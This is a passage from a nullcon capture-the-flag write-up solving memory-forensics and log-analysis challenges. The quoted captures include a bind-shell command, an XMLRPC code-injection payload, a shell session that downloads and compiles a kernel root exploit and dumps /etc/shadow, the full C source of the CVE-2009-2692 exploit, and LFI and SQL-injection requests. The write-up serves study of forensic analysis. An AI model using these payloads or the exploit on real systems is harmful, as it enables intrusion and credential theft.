  30. 30. Fix header magic value (EFI PART) and number of partitions using vi in binary mode (:%!xxd) and runmmls again. (See references)[nullc0n]$ mmls -t gpt ./image3.ddInvalid sector address (gpt_load_table: Starting sector too large for image)Download Sleuthkit and comment out section where mmls is throwing error and exiting. Compileand run.Patch[nullc0n]$ diff -pu sleuthkit-3.2.3/tsk3/vs/gpt.c*--- sleuthkit-3.2.3/tsk3/vs/gpt.c 2012-01-15 18:32:13.302732773 +0530+++ sleuthkit-3.2.3/tsk3/vs/gpt.c.orig 2012-01-20 16:43:37.251203455 +0530@@ -212,7 +212,7 @@ gpt_load_table(TSK_VS_INFO * vs) } // make sure the first couple are in the image bounds- /*if ((i < 2)+ if ((i < 2) && (tsk_getu64(vs->endian, ent->start_lba) > max_addr)) { tsk_error_reset(); tsk_errno = TSK_ERR_VS_BLK_NUM;@@ -221,7 +221,7 @@ gpt_load_table(TSK_VS_INFO * vs) free(sect_buf); free(ent_buf); return 1;- }*/+ } if ((name = tsk_malloc(256)) == NULL) {[nullc0n]$ ./sleuthkit-3.2.3/tools/vstools/mmls -t gpt ./image3.ddGUID Partition Table (EFI)Offset Sector: 0Units are in 512-byte sectors Slot Start End Length Description00: Meta 0000000000 0000000000 0000000001 Safety Table01: ----- 0000000000 0000002047 0000002048 Unallocated02: Meta 0000000001 0000000001 0000000001 GPT Header03: Meta 0000000002 0000000004 0000000003 Partition Table04: 00 0000002048 0098566144 009856409705: 08 0098566145 0098568191 000000204706: 01 0098568192 0182454271 008388608007: 02 0182454272 0203425791 002097152008: 03 0203425792 0253757439 005033164809: 04 0253757440 0310380543 005662310410: 05 0310380544 0352323583 004194304011: 06 0352323584 0406849535 0054525952 L12: 07 0406849536 0488397134 0081547599
  31. 31. Refered Wiki for GUID Partitition table for UUID for file system types. Mapping done manually.References:http://en.wikipedia.org/wiki/Master_boot_recordhttp://en.wikipedia.org/wiki/GUID_Partition_Tablehttp://www.aqfire.com/boot/http://www.digitalforensics.ch/nikkel09.pdfForensics Level 5: Universal Swindlers BayonetAnusandhaanic Daakus Ltd. Is a company whose strength lies in the researches it conducts. Veryoften the employees leaving the organisation manage to carry the research data alongwith. Thistime company decided to go for the investigation and called upon a forensic investigator. Thisinvestigator captured the memory dump and shut the system down. On resuming the system hefinds that the drive has been encrypted and is left with only the memory dump.You as an investigator are required to find out the following information from the dump1) Serial No. of external drive2) Date and time (IST) when the drive was first connected3)Date and time (IST) when the drive was last connected4) Launching which other executable (Not nullcon.exe>) resulted in launching of nullcon.exeTools Used: string, grep volatility frameworkSteps:[flevel5]$ python ./volatility/trunk/vol.py hivelist -f ./null.imgVolatile Systems Volatility Framework 2.1_alphaVirtual Physical Name0x8067b184 0x0067b184 [no name]0xe19fb380 0x0a1ec380 DeviceHarddiskVolume1Documents and SettingsuserLocalSettingsApplication DataMicrosoftWindowsUsrClass.dat0xe1a448d0 0x0a5038d0 DeviceHarddiskVolume1Documents and SettingsuserNTUSER.DAT0xe17599f8 0x089629f8 DeviceHarddiskVolume1Documents and SettingsLocalServiceLocalSettingsApplication DataMicrosoftWindowsUsrClass.dat0xe1754008 0x0895b008 DeviceHarddiskVolume1Documents andSettingsLocalServiceNTUSER.DAT
  32. 32. 0xe172b430 0x08508430 DeviceHarddiskVolume1Documents andSettingsNetworkServiceLocal SettingsApplication DataMicrosoftWindowsUsrClass.dat0xe1726698 0x083fd698 DeviceHarddiskVolume1Documents andSettingsNetworkServiceNTUSER.DAT0xe1447008 0x06c9d008 DeviceHarddiskVolume1WINDOWSsystem32configsoftware0xe1447b60 0x06c9db60 DeviceHarddiskVolume1WINDOWSsystem32configdefault0xe14476b8 0x06c9d6b8 DeviceHarddiskVolume1WINDOWSsystem32configSAM0xe1430330 0x06c90330 DeviceHarddiskVolume1WINDOWSsystem32configSECURITY0xe1331b60 0x02c6eb60 [no name]0xe101bad8 0x02994ad8 DeviceHarddiskVolume1WINDOWSsystem32configsystem0xe1008b60 0x029cdb60 [no name]We find that SYSTEM is located at offset 0xe101bad8. We use this to print specific registry keys.[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K "CurrentControlSet" -f null.imgVolatile Systems Volatility Framework 2.1_alphaLegend: (S) = Stable (V) = Volatile----------------------------Registry: User SpecifiedKey name: CurrentControlSet (V)Last updated: 2012-01-06 12:39:30Subkeys:Values:REG_LINK SymbolicLinkValue : (V) RegistryMachineSystemControlSet001[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K"ControlSet001ControlDeviceClasses" -f null.imgVolatile Systems Volatility Framework 2.1_alphaLegend: (S) = Stable (V) = Volatile----------------------------Registry: User SpecifiedKey name: DeviceClasses (S)Last updated: 2012-01-05 13:24:36Subkeys: (S) {378de44c-56ef-11d1-bc8c-00a0c91405dd} (S) {3abf6f2d-71c4-462a-8a92-1e6861e6af27} (S) {a5dcbf10-6530-11d2-901f-00c04fb951ed} (S) {f18a0e88-c30c-11d0-8815-00a0c906bed8}[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K"ControlSet001ControlDeviceClasses{a5dcbf10-6530-11d2-901f-00c04fb951ed}" -f null.imgVolatile Systems Volatility Framework 2.1_alphaLegend: (S) = Stable (V) = Volatile----------------------------Registry: User Specified
  33. 33. Key name: {a5dcbf10-6530-11d2-901f-00c04fb951ed} (S)Last updated: 2012-01-05 13:24:36Subkeys: (S) ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed}Values:[flevel5]$ python ./volatility/trunk/vol.py printkey -o 0xe101bad8 -K"ControlSet001ControlDeviceClasses{a5dcbf10-6530-11d2-901f-00c04fb951ed}##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed}" -f null.imgVolatile Systems Volatility Framework 2.1_alphaLegend: (S) = Stable (V) = Volatile----------------------------Registry: User SpecifiedKey name: ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed} (S)Last updated: 2012-01-06 12:22:13Subkeys: (S) #Values:REG_SZ DeviceInstance : (S) USBVid_0bc2&Pid_21012GEL32TNFrom above, we find that the Serial number of the removable disk is 2GEL32TNWhen It was first connected, the registry entrySYSTEMControlSet001ControlDeviceClasses{a5dcbf10-6530-11d2-901f-00c04fb951ed} wascreated. Therefore its last update time 2012-01-05 13:24:36 UTC is our flag2 after converting to IST.Its subkey ##?#USB#Vid_0bc2&Pid_2101#2GEL32TN#{a5dcbf10-6530-11d2-901f-00c04fb951ed} isupdated every-time the device is connected. Therefore its last update time is our flag 3Used pslist in volatility to list processesOffset(V) Name PID PPID Thds Hnds Time---------- -------------------- ------ ------ ------ ------ -------------------0x821c6a00 System 4 0 59 240 1970-01-01 00:00:000x81f5fb10 smss.exe 580 4 3 21 2012-01-06 12:39:370x81ff92a0 csrss.exe 644 580 11 349 2012-01-06 12:39:380x81ff8da0 winlogon.exe 668 580 20 503 2012-01-06 12:39:380x81fe35d0 services.exe 712 668 15 258 2012-01-06 12:39:380x81feebb8 lsass.exe 724 668 26 343 2012-01-06 12:39:380x81fa8ac0 svchost.exe 900 712 20 201 2012-01-06 12:39:380x82018438 svchost.exe 968 712 10 227 2012-01-06 12:39:390x81f84210 svchost.exe 1056 712 72 1193 2012-01-06 12:39:390x82002530 svchost.exe 1176 712 5 58 2012-01-06 12:39:390x81fe8620 svchost.exe 1212 712 14 204 2012-01-06 12:39:390x81f586f0 spoolsv.exe 1336 712 13 122 2012-01-06 12:39:390x81f7a428 explorer.exe 1584 1568 13 374 2012-01-06 12:39:400x81b73020 alg.exe 516 712 7 103 2012-01-06 12:39:490x81b941e0 nullcon.exe 484 1584 1 22 2012-01-06 12:40:07
  34. 34. 0x81b403a8 cmd.exe 1048 1584 1 31 2012-01-06 12:40:130x81ba3020 cmd.exe 320 484 1 28 2012-01-06 12:40:200x81b7b020 win32dd.exe 856 1048 1 21 2012-01-06 12:40:30Initially thought Flag4 would be explorer.exe which Is the parent process of nulcon.exe. However, itwas not correct.Using strings and grep to search for nullcon.exe[flevel5]$ strings null.img |grep -i nullcon.exenullcon.exeC:WINDOWSsystem32Nullcon.exeC:WINDOWSsystem32Nullcon.exenullcon.exeNULLCON.EXEC:WINDOWSsystem32Nullcon.exeC:WINDOWSsystem32Nullcon.exeNullcon.exeC:WINDOWSsystem32Nullcon.exeNullcon.exe "C:WINDOWSsystem32mshearts.exe"Nullcon.exeThis gives us Flag 4 as mshearts.exeReferences: 1. https://blogs.sans.org/computer- forensics/files/2009/08/usb_device_forensics_xp_guide.pdf 2. http://cse.spsu.edu/raustin2/coursefiles/forensics/How_to_use_Volatility_v2.pdfLog Analysis Level 1: BasicLog URL: http://www.nullcon.net/challenge/data/reportFound interesting line in log:+ OSVDB-3268: GET /challenge/logically_insane/ : Directory indexing isenabled: /challenge/logically_insane/Found askmelate.asp in /challenge/logically_insaneClue: Ask the proper question to get the proper answer<!-- askmelater.asp?question=? -->
  35. 35. Question: How to find the flag?http://www.nullcon.net/challenge/logically_insane/askmelater.asp?question=how%20to%20find%20the%20flag?Flag: 6bb61e3b7bce0931da574d19d1d82c88Log Analysis Level 2: Mystery PasswordFind password for user suppadminLog URL: http://www.nullcon.net/challenge/data/log3.pcapTools Used: WiresharkSteps: Open file in wireshark.Flag: ..Supp@..adm1n # Flag includes the dotsLog Analysis Level 3: Clever IntruderLog URL: http://www.nullcon.net/challenge/data/access.rarOnly 3 IPs were found in log. Started with 192.168.0.107[nullc0n]$ cat access.log |grep 192.168.0.107
  36. 36. 192.168.0.107 - - [06/Jan/2012:00:56:04 +0530] "GET /index.php HTTP/1.1" 200 1364"http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3)Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"192.168.0.107 - - [06/Jan/2012:00:56:04 +0530] "GET /javascript/jquery.js HTTP/1.1" 404 511 "http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3)Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"192.168.0.107 - - [06/Jan/2012:00:56:04 +0530] "GET /javascript/common.js HTTP/1.1" 404 511"http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3)Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"192.168.0.107 - - [06/Jan/2012:00:56:05 +0530] "GET /Contacts.php HTTP/1.1" 500 274"http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"192.168.0.107 - - [06/Jan/2012:00:56:12 +0530] "GET /add-contact.php HTTP/1.1" 500 274"http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"192.168.0.107 - - [06/Jan/2012:00:56:16 +0530] "GET /search.php HTTP/1.1" 500 274"http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"192.168.0.107 - - [06/Jan/2012:00:57:51 +0530] "GET /search.php HTTP/1.1" 500 274"http://192.168.0.106/index.php" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"192.168.0.107 - - [06/Jan/2012:00:58:00 +0530] "GET /contact.php?c=bmMgLWwgLXAgNjY2Ng==HTTP/1.1" 500 274 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.3) Gecko/20100423 Ubuntu/10.04 (lucid) Firefox/3.6.3"Base64decode(“bmMgLWwgLXAgNjY2Ng==”)=”nc -l -p 6666”Flags:Vulnerable Page: contact.phpPort Opened: 6666Intruder IP: 192.168.0.107Log Analysis Level 4: Exploited!!!CVE of the Exploit is the FlagLog URL: http://www.nullcon.net/challenge/data/burp.rarApproach: Search for succeeded requests ie HTTP response code 200(<status>200</status>). Found27 such request responses.Among them the following looks interesting:<item> <time>Thu Jan 12 02:29:39 EST 2012</time> <url><![CDATA[http://192.168.221.154/tikiwiki/scripts/server.php]]></url> <host ip="192.168.221.154">192.168.221.154</host> <port>80</port> <protocol>http</protocol> <method>POST</method> <path><![CDATA[/tikiwiki/scripts/server.php]]></path>
  37. 37. <extension>php</extension> <request><![CDATA[POST /tikiwiki/scripts/server.php HTTP/1.1TE: deflate,gzip;q=0.3Connection: TE, closeHost: 192.168.221.154User-Agent: Internet Explorer 6.0Content-Length: 360<?xmlversion="1.0"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>,)); system(id); die; /*</name></value></param></params></methodCall>]]></request> <status>200</status> <responselength>283</responselength> <mimetype>text</mimetype> <response><![CDATA[HTTP/1.1 200 OKDate: Thu, 12 Jan 2012 07:24:16 GMTServer: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.10 with Suhosin-PatchX-Powered-By: PHP/5.2.4-2ubuntu5.10Connection: closeContent-Type: text/htmlContent-Length: 54uid=33(www-data) gid=33(www-data) groups=33(www-data)]]></response> <comment></comment> </item>From the above it looks like a code execution bug in XMLRPC used in tikiwiki. Google search yieldedCVE-2005-1921Flag: CVE-2005-1921Log Analysis Level 5: Waat Laga ServerLog URL: http://www.nullcon.net/challenge/data/dump.rarFlag-I: Vulnerable Parameter in 1st AttackFlag-II: Vulnerable Parameter in 2nd AttackFlag-III: Names of the people who discovered the Local Privilege Escalation Exploit usedFlag-IV: root PasswordTools Used: Wireshark. johnLoaded file in Wireshark. Sorted the packets by packet size and used Follow TCP Stream to analysesessions starting with the largest ones. Found the following in one such TCP stream:
  38. 38. sh: no job control in this shellsh-3.1$ iduid=48(apache) gid=48(apache) groups=48(apache) context=system_u:system_r:httpd_sys_script_tsh-3.1$ uname -aLinux ctf4.sas.upenn.edu 2.6.15-1.2054_FC5 #1 Tue Mar 14 15:48:33 EST 2006 i686 i686 i386GNU/Linuxsh-3.1$ cd /tmp/sh-3.1$ ls -latotal 904drwxrwxrwt 15 root root 4096 Jan 11 10:07 .drwxr-xr-x 23 root root 4096 Jan 11 09:38 ..drwxrwxrwt 2 root root 4096 Jan 11 07:15 .ICE-unix-r--r--r-- 1 root root 11 Jan 11 07:07 .X0-lockdrwxrwxrwt 2 root root 4096 Jan 11 07:07 .X11-unixdrwxrwxrwt 2 root root 4096 Jan 11 07:06 .font-unixsrw-rw-rw- 1 root root 0 Jan 11 07:07 .gdm_socketdrwx------ 2 root root 4096 Mar 6 2009 .mozilla-rw-rw-rw- 1 mysql mysql 13 Jan 11 09:57 1.txt-rw-rw-rw- 1 mysql mysql 36 Jan 11 09:58 2.txtdrwx------ 2 achen achen 4096 Mar 10 2009 gconfd-achendrwx------ 2 dstevens dstevens 4096 Mar 11 2009 gconfd-dstevensdrwx------ 2 ghighland ghighland 4096 Mar 10 2009 gconfd-ghighlanddrwx------ 2 root root 4096 Mar 18 2009 gconfd-rootdrwx------ 3 sorzek sorzek 4096 Jan 11 07:15 gconfd-sorzekdrwx------ 2 sorzek sorzek 4096 Jan 11 07:15 keyring-FiP3XIsrwxrwxr-x 1 achen achen 0 Mar 10 2009 mapping-achensrwxrwxr-x 1 dstevens dstevens 0 Mar 11 2009 mapping-dstevenssrwxrwxr-x 1 ghighland ghighland 0 Mar 10 2009 mapping-ghighlandsrwxr-xr-x 1 root root 0 Mar 18 2009 mapping-rootsrwxrwxr-x 1 sorzek sorzek 0 Jan 11 07:15 mapping-sorzekdrwx------ 2 sorzek sorzek 4096 Jan 11 07:16 orbit-sorzek-rwsr-xr-x 1 root root 720888 Jan 11 10:09 shdrwx------ 2 sorzek sorzek 4096 Jan 11 07:15 ssh-yXwuKb2964-rw-rw-rw- 1 mysql mysql 13 Jan 11 10:07 test1.txt-rw-rw-rw- 1 mysql mysql 36 Jan 11 10:07 test2.txtdrwx------ 2 sorzek sorzek 4096 Jan 11 07:15 virtual-sorzek.7IeXOH-rw------- 1 sorzek sorzek 1062 Jan 11 08:15 xses-sorzek.HeSMY4sh-3.1$ wget http://192.168.221.130/exploit/9479.c--10:09:30-- http://192.168.221.130/exploit/9479.c => `9479.cConnecting to 192.168.221.130:80... connected.HTTP request sent, awaiting response... 200 OKLength: 3,379 (3.3K) [text/x-csrc] 0K ... 100% 61.97 MB/s10:09:30 (61.97 MB/s) - `9479.c saved [3379/3379]sh-3.1$ gcc 9479.c -o rootsh-3.1$ ./rootsh: no job control in this shell
  39. 39. sh-3.1# iduid=0(root) gid=0(root) groups=48(apache) context=system_u:system_r:httpd_sys_script_tsh-3.1# cat /etc/passwdroot:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System message bus:/:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologindistcache:x:94:94:Distcache:/:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinnscd:x:28:28:NSCD Daemon:/:/sbin/nologinvcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologinwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologindovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologinmysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bashnetdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bashpcap:x:77:77::/var/arpwatch:/sbin/nologinavahi:x:70:70:Avahi daemon:/:/sbin/nologinnamed:x:25:25:Named:/var/named:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinrpc:x:32:32:Portmapper RPC user:/:/sbin/nologinxfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologingdm:x:42:42::/var/gdm:/sbin/nologinrpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologindstevens:x:500:506:Don Stevens:/home/dstevens:/bin/bashachen:x:501:501:Andrew Chen:/home/achen:/bin/bashpmoore:x:502:502:Phillip Moore:/home/pmoore:/bin/bashjdurbin:x:503:503:James Durbin:/home/jdurbin:/bin/bashsorzek:x:504:504:Sally Orzek:/home/sorzek:/bin/bashghighland:x:505:505:Greg Highland:/home/ghighland:/bin/bashossec:x:506:508::/var/ossec:/sbin/nologinossecm:x:507:508::/var/ossec:/sbin/nologinossecr:x:508:508::/var/ossec:/sbin/nologin
  40. 40. sh-3.1# cat /etc/issueFedora Core release 5 (Bordeaux)Kernel r on an msh-3.1# cat /etc/shadowroot:$1$IW2CPQzs$ba/aJ9zePc/r9tF2R6KAJ0:15350:0:99999:7:::bin:*:14309:0:99999:7:::daemon:*:14309:0:99999:7:::adm:*:14309:0:99999:7:::lp:*:14309:0:99999:7:::sync:*:14309:0:99999:7:::shutdown:*:14309:0:99999:7:::halt:*:14309:0:99999:7:::mail:*:14309:0:99999:7:::news:*:14309:0:99999:7:::uucp:*:14309:0:99999:7:::operator:*:14309:0:99999:7:::games:*:14309:0:99999:7:::gopher:*:14309:0:99999:7:::ftp:*:14309:0:99999:7:::nobody:*:14309:0:99999:7:::dbus:!!:14309:0:99999:7:::rpm:!!:14309:0:99999:7:::apache:!!:14309:0:99999:7:::distcache:!!:14309:0:99999:7:::ntp:!!:14309:0:99999:7:::nscd:!!:14309:0:99999:7:::vcsa:!!:14309:0:99999:7:::webalizer:!!:14309:0:99999:7:::dovecot:!!:14309:0:99999:7:::mysql:!!:14309:0:99999:7:::netdump:!!:14309:0:99999:7:::pcap:!!:14309:0:99999:7:::avahi:!!:14309:0:99999:7:::named:!!:14309:0:99999:7:::mailnull:!!:14309:0:99999:7:::smmsp:!!:14309:0:99999:7:::haldaemon:!!:14309:0:99999:7:::rpc:!!:14309:0:99999:7:::xfs:!!:14309:0:99999:7:::gdm:!!:14309:0:99999:7:::rpcuser:!!:14309:0:99999:7:::nfsnobody:!!:14309:0:99999:7:::sshd:!!:14309:0:99999:7:::dstevens:$1$fU8HOHqa$N542xtl0ft8NmsYkv5NFo/:14309:0:99999:7:::achen:$1$kxyn25Oz$w.MMADGQYIq4F52hi9DUQ.:14309:0:99999:7:::pmoore:$1$p0RXlomV$m03UsjoTZ08qG8gbWHgST0:14309:0:99999:7:::jdurbin:$1$CYmEyuc.$FXAeZHkhywwENbqE8h0O.0:14309:0:99999:7:::sorzek:$1$cWeWNRdU$VTtlKsoRBmhMghnkSwqCQ.:14312:0:99999:7:::ghighland:$1$ooKvtZEY$N2RpSaIylgFlHnBkbwUGz0:14309:0:99999:7:::ossec:!!:14312:0:99999:7:::
  41. 41. ossecm:!!:14312:0:99999:7:::ossecr:!!:14312:0:99999:7:::sh-3.1# exitexitsh-3.1$ exitexitCopied /etc/shadow to pass.txt and used john(http://www.openwall.com/john/) with wordlist(http://download.openwall.net/pub/wordlists/all.gz) to crack password file using a downloadedpassword file.[nullc0n]$ john -show pass.txtroot:zuzana:15350:0:99999:7:::sorzek:pacman:14312:0:99999:7:::2 password hashes cracked, 5 leftThis gives us Flag IV: zuzanaIn another TCP session we got:HTTP/1.1 200 OKDate: Thu, 12 Jan 2012 06:18:26 GMTServer: Apache/2.2.14 (Ubuntu)Last-Modified: Wed, 11 Jan 2012 12:36:23 GMTETag: "41d4c-d33-4b63fe12b3b1c"Accept-Ranges: bytesContent-Length: 3379Keep-Alive: timeout=15, max=100Connection: Keep-AliveContent-Type: text/x-csrc/***** 0x82-CVE-2009-2692** Linux kernel 2.4/2.6 (32bit) sock_sendpage() local ring0 root exploit (simple ver)** Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.**** --** Discovered by Tavis Ormandy and Julien Tinnes of the Google Security Team.** spender and venglins code is very excellent.** Thankful to them.**** Greets: Brad Spengler <spender(at)grsecurity(dot)net>,** Przemyslaw Frasunek <venglin(at)czuby(dot)pl>.** --** exploit by <p0c73n1(at)gmail(dot)com>.
  42. 42. **** "Slow and dirty exploit for this one"***/#include <stdio.h>#include <unistd.h>#include <sys/socket.h>#include <sys/mman.h>#include <fcntl.h>#include <sys/personality.h>unsigned int uid, gid;void kernel_code(){.unsigned long where=0;.unsigned long *pcb_task_struct;.where=(unsigned long )&where;.where&=~8191;.pcb_task_struct=(unsigned long *)where;.while(pcb_task_struct){..if(pcb_task_struct[0]==uid&&pcb_task_struct[1]==uid&&...pcb_task_struct[2]==uid&&pcb_task_struct[3]==uid&&...pcb_task_struct[4]==gid&&pcb_task_struct[5]==gid&&...pcb_task_struct[6]==gid&&pcb_task_struct[7]==gid){...pcb_task_struct[0]=pcb_task_struct[1]=pcb_task_struct[2]=pcb_task_struct[3]=0;...pcb_task_struct[4]=pcb_task_struct[5]=pcb_task_struct[6]=pcb_task_struct[7]=0;...break;..}..pcb_task_struct++;.}.return;./*.** By calling iret after pushing a register into kernel stack,.** We dont have to go back to ring3(user mode) privilege level. dont worry. :-}.**.** kernel_code() function will return to its previous status which means before sendfile() systemcall,.** after operating upon a ring0(kernel mode) privilege level..** This will enhance the viablity of the attack code even though each kernel can have different CSand DS address..*/}void *kernel=kernel_code;int main(int argc,char *argv[]){.int fd_in=0,fd_out=0,offset=1;
  43. 43. .void *zero_page;.uid=getuid();.gid=getgid();.if(uid==0){..fprintf(stderr,"[-] check ur uidn");..return -1;.}./*.** There are some cases that we need mprotect due to the dependency matter with SVR4.(however, I did not confirm it yet).*/.if(personality(0xffffffff)==PER_SVR4){..if(mprotect(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC)==-1){...perror("[-] mprotect()");...return -1;..}.}.elseif((zero_page=mmap(0x00000000,0x1000,PROT_READ|PROT_WRITE|PROT_EXEC,MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE,0,0))==MAP_FAILED){...perror("[-] mmap()");...return -1;.}.*(char *)0x00000000=0xff;.*(char *)0x00000001=0x25;.*(unsigned long *)0x00000002=(unsigned long)&kernel;.*(char *)0x00000006=0xc3;.if((fd_in=open(argv[0],O_RDONLY))==-1){..perror("[-] open()");..return -1;.}.if((fd_out=socket(PF_APPLETALK,SOCK_DGRAM,0))==-1){..if((fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0))==-1){...perror("[-] socket()");...return -1;..}.}gogossing:./*.** Sometimes, the attacks can fail. To enlarge the possiblilty of attack,.** an attacker can make all the processes runing under current user uid 0..*/.if(sendfile(fd_out,fd_in,&offset,2)==-1){..if(offset==0){...perror("[-] sendfile()");...return -1;..}..close(fd_out);
  44. 44. ..fd_out=socket(PF_BLUETOOTH,SOCK_DGRAM,0);.}.if(getuid()==uid){..if(offset){...offset=0;..}..goto gogossing; /* all process */.}.close(fd_in);.close(fd_out);.execl("/bin/sh","sh","-i",NULL);.return 0;}/* eoc */// milw0rm.com [2009-08-24]This gives us Flag III as Tavis Ormandy and Julien TinnesAnother TCP session gave the following:GET /index.html?page=../../../../../../../../../tmp/test2.txt%00&c=ls HTTP/1.1Host: 192.168.221.143User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip, deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Connection: keep-aliveHTTP/1.1 200 OKDate: Wed, 11 Jan 2012 15:08:00 GMTServer: Apache/2.2.0 (Fedora)X-Powered-By: PHP/5.1.2Content-Length: 1373
  45. 45. Connection: closeContent-Type: text/html; charset=UTF-8<html><head><title> Prof. Ehks</title><style type="text/css">BODY {.font-family: helvetica, arial;.padding: 0px;.margin: 0px;}TABLE.nav {.background-color: #336699;}TABLE.nav a {.color: white;.text-decoration: none;}H1.title {.width: 100%;.background-color: #6699cc;.padding: 5px;.margin: 0px;.border-bottom: 3px solid #113366;}DIV#main {.margin: 5px;}</style></head><body><table width="100%" class="nav"><tr>.<td><a href="index.html?title=Home Page">Home</a></td>.<td><a href="index.html?page=blog&title=Blog">Blog</a></td>.<td><a href="index.html?page=research&title=Research">Research</a></td>.<td><a href="index.html?page=contact&title=Contact">Contact</a></td>.<form method="post" action="index.html?page=search&title=Search Results">.<td><input type="text" value="search" name="searchterm"/><input type="submit"value="Go"/></td>.</form>.<!--<td><a href="/usage">Stats</a></td>--></tr>
  46. 46. </table><h1 class="title">Professor Ehks Center for Data Studies</h1><div id="main">1.<br /><b>Notice</b>: Use of undefined constant c - assumed c in <b>/tmp/test2.txt</b> on line<b>1</b><br />admincalendarconfimagesincindex.htmlindex.html.bakmailpagesrestrictedrobots.txtsql.3.4.5</div><div id="center" style="text-align:center;width:100%"><ahref="mailto:webmaster@localhost">webmaster</a></div></body></html>The above shows that there is a flaw in parameter page.Another attack targeted parameter id as shown below:GET/index.html?page=blog&title=Blog&id=2+AND+1=2+UNION+ALL+SELECT+1,%27test%27,3,4,5+INTO+OUTFILE+%27/tmp/test1.txt%27--+- HTTP/1.1Host: 192.168.221.143User-Agent: Mozilla/5.0 (X11; Linux i686; rv:7.0.1) Gecko/20100101 Firefox/7.0.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-us,en;q=0.5Accept-Encoding: gzip, deflateAccept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7Connection: keep-alive
  47. 47. HTTP/1.1 200 OKDate: Wed, 11 Jan 2012 15:07:02 GMTServer: Apache/2.2.0 (Fedora)X-Powered-By: PHP/5.1.2Content-Length: 1336Connection: closeContent-Type: text/html; charset=UTF-8<html><head><title> Prof. EhksBlog</title><style type="text/css">BODY {.font-family: helvetica, arial;.padding: 0px;.margin: 0px;}TABLE.nav {.background-color: #336699;}TABLE.nav a {.color: white;.text-decoration: none;}H1.title {.width: 100%;.background-color: #6699cc;.padding: 5px;.margin: 0px;.border-bottom: 3px solid #113366;}DIV#main {.margin: 5px;}</style></head>Similarly there were other attacks as shown below
  48. 48. From the above we can infer that the attacks on parameter id was done before the attack onparameter page. Attacker first exploited SQL injection flawTherefore the flags are:Flag I idFlag II pageFlag III Tavis Ormandy and Julien TinnesFlag IV zuzana

×